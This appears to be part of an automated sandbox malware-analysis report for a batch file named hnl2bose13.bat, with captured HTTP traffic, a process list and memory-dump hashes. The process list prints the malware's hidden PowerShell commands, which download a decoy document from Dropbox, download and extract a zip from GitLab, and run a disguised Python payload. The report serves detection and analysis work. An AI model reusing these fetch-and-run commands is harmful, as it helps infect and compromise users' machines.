Content-Security-Policy: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_succes [TRUNCATED]
Content-Type: text/html; charset=utf-8
Location: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViGUKEb8nSbHLeokdyXVSSsdAjqEK6ii0Dp3z_qzP08r6FfH3AIJvFsL2UNpAEz3opEN74PommI1DRhRl1s8qf4Strwp8b9X_Tn5JVpiwdDQPLME9BKXbqVGrUbeF4L/file?dl=1#
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MzEyMDQ3NzM4NTk0MjcyNDgzMTU4NjE4Mzc0MTIzNzA3NTE4MzI=; Path=/; Expires=Sat, 17 Nov 2029 08:56:04 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: t=tdNgJ1jXf9EuYyP8Rovm1w8I; Path=/; Domain=dropbox.com; Expires=Tue, 18 Nov 2025 08:56:04 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: __Host-js_csrf=tdNgJ1jXf9EuYyP8Rovm1w8I; Path=/; Expires=Tue, 18 Nov 2025 08:56:04 GMT; Secure; SameSite=None
Set-Cookie: __Host-ss=BvoXwfZM7c; Path=/; Expires=Tue, 18 Nov 2025 08:56:04 GMT; HttpOnly; Secure; SameSite=Strict
Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sat, 17 Nov 2029 08:56:04 GMT
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Length: 17
Date: Mon, 18 Nov 2024 08:56:05 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server: envoy
Cache-Control: no-cache, no-store
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 204c838655b94d15afcff026704d091d
Connection: close
2024-11-18 08:56:05 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49722 | 172.65.251.78 | 443 | 1584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:56:11 UTC | 95 | OUT | GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1
Host: gitlab.com
Connection: Keep-Alive
2024-11-18 08:56:11 UTC | 169 | IN | HTTP/1.1 302 Found
Date: Mon, 18 Nov 2024 08:56:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
cache-control: no-cache
2024-11-18 08:56:11 UTC | 2340 | IN | Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2024-11-18 08:56:11 UTC | 571 | IN | Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 73 53 5a 77 4d 6f 67 79 43 42 36 25 32 42 69 6b 65 37 5a 6e 32 4e 65 35 70 69 61 4f 70 66 75 55 6c 6e 47 52 65 30 66 68 39 6b 69 61 55 47 68 73 69 62 35 45 77 5a 57 56 4d 68 56 77 68 41 6f 79 4f 46 53 35 61 35 74 59 4d 56 74 6a 38 5a 35 36 50 50 35 74 47 50 4f 76 35 36 43 54 43 42 45 64 61 44 41 46 49 51 4f 33 6a 31 71 30 35 65 39 50 61 35 75 77 5a 4c 77 73 32 78 34 68 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSZwMogyCB6%2Bike7Zn2Ne5piaOpfuUlnGRe0fh9kiaUGhsib5EwZWVMhVwhAoyOFS5a5tYMVtj8Z56PP5tGPOv56CTCBEdaDAFIQO3j1q05e9Pa5uwZLws2x4hk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"su
2024-11-18 08:56:11 UTC | 104 | IN | Data Raw: 36 32 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 75 73 65 72 73 2f 73 69 67 6e 5f 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 62<html><body>You are being <a href="https://gitlab.com/users/sign_in">redirected</a>.</body></html>
2024-11-18 08:56:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49729 | 172.65.251.78 | 443 | 1584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:56:12 UTC | 49 | OUT | GET /users/sign_in HTTP/1.1
Host: gitlab.com
2024-11-18 08:56:12 UTC | 1279 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 18 Nov 2024 08:56:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8200
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
                                                                                                                                                                                        X-Content-Options: nosniff
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-mitigated: challenge
Target ID: 0
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
Imagebase: 0x7ff69e8d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 1
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp.com 437
Imagebase: 0x7ff7bea50000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c type tmp
Imagebase: 0x7ff69e8d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
Imagebase: 0x7ff6dd190000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
Imagebase: 0x7ff6dd190000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 03:55:59
Start date: 18/11/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
                                                                                                                                                                                        Imagebase:0x7ff6dd190000
                                                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:fINd
                                                                                                                                                                                        Imagebase:0x7ff645d80000
                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:find
                                                                                                                                                                                        Imagebase:0x7ff645d80000
                                                                                                                                                                                        File size:17'920 bytes
                                                                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                        Imagebase:0x7ff69e8d0000
                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                        Start time:03:55:59
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:03:56:07
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                        Start time:03:56:08
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:03:56:19
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:03:56:34
                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.2213377786.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd34980000_powershell.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.2213003728.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .@_H
                                                                                                                                                                                          • API String ID: 0-1410794216
                                                                                                                                                                                          • Opcode ID: 968904140047418573a3af7d9219827d3baca2174a9f4328f8e3a0a9e5d4b3af
                                                                                                                                                                                          • Instruction ID: 9cec72f3c75a77a2047319f0d25769d8f6d68ce746c837ce021becbc97118351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 968904140047418573a3af7d9219827d3baca2174a9f4328f8e3a0a9e5d4b3af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F13A22A0EBC81FE796976C58B55A63FE0EF57210F0A01FFE589C71D3D919A805C362
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f34676d1c20b6844a0d4db5167b1bed4159ac7677ef6d6c2ceb0992e8d4ef652
                                                                                                                                                                                          • Instruction ID: 4419859bba7a61ee2952ad7644098076503ecb5df5dadf075f4ae55df8ec752d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f34676d1c20b6844a0d4db5167b1bed4159ac7677ef6d6c2ceb0992e8d4ef652
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F418811A4E7C11FE397977858B96A93FA1AF43250F1A40EFE5C9CB0E3D909184AD322
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 063f4ae6331da7884f5f90bb0a2293c6cf1624d46b92f039def56e94958e65a6
                                                                                                                                                                                          • Instruction ID: 95a69079818e4b3718d056183f6fc577cbe30d2cc10a61306ecd997722fd1200
                                                                                                                                                                                          • Opcode Fuzzy Hash: 063f4ae6331da7884f5f90bb0a2293c6cf1624d46b92f039def56e94958e65a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8312932B0D6494FEBA5DB5C94A16F9B7D1EF9A310B1801BFC14DC7197DA2AE801D390
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction ID: e92491c9255ae72436feed8be03ea643d68fb7feaa7104570ccfcc87c8a9a20b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e8b78f8c70ba3de70868bb01449793a0641045de301db4a76122c5f9a848ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110271F0E6854FEBA1DB5C84A51B9B7D1FF8A310B0400BEC64DC7187CA2AE845C360
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2329378938.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34980000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1320a15184628fd84dfa4f08e18db2d7af5b68bdb466e71c2bdc174f02abea27
                                                                                                                                                                                          • Instruction ID: 545e11f6bdcc0c35dc108c0c1777c9fd829283a60cfb2af46c81d7dcb710b4b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1320a15184628fd84dfa4f08e18db2d7af5b68bdb466e71c2bdc174f02abea27
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01F532F0EB454FEBADA65C54A60B872D1FF8625474500BEE14DC31A7DD2EAC059200
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.2328846814.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd348b0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction ID: 5e2e1d49d45fb6b89b0fa391f2236679d183cf699ff5fb0ffebb47dcbf80b9fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401A73020CB0C4FD744EF4CE051AA5B3E0FB99320F10052DE58AC3665DA36E881CB41
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 43cb578ce7550646a1b5ff006ae9206e8051b3484cac66d10d54d14a6a07693b
                                                                                                                                                                                          • Instruction ID: 45967c32e0324941d0557a333ee1374e97b3d4609597a7977a858f9f681df96a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43cb578ce7550646a1b5ff006ae9206e8051b3484cac66d10d54d14a6a07693b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E12622B0EBC51FE756973858A51A47FE0EF93310B0901FFD299CB1A7D91DA806D361
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d359eb80b36f8a1cd514f94e646c383f9fbaf8c1cfa42855856b632673e92a51
                                                                                                                                                                                          • Instruction ID: c68a75e0103e47e402f94dea2572e3de59b1443b5559f98f867da164757be3d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d359eb80b36f8a1cd514f94e646c383f9fbaf8c1cfa42855856b632673e92a51
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F413821B0DA894FE755872888A56B03BE1EF47310F0A01FED25DC7197DA2EEC06D7A1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.2479081991.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd34990000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 07f399bf2c0dad9afeafcc7e20995875f1a14ea69ecaae492e613e93fac270e8
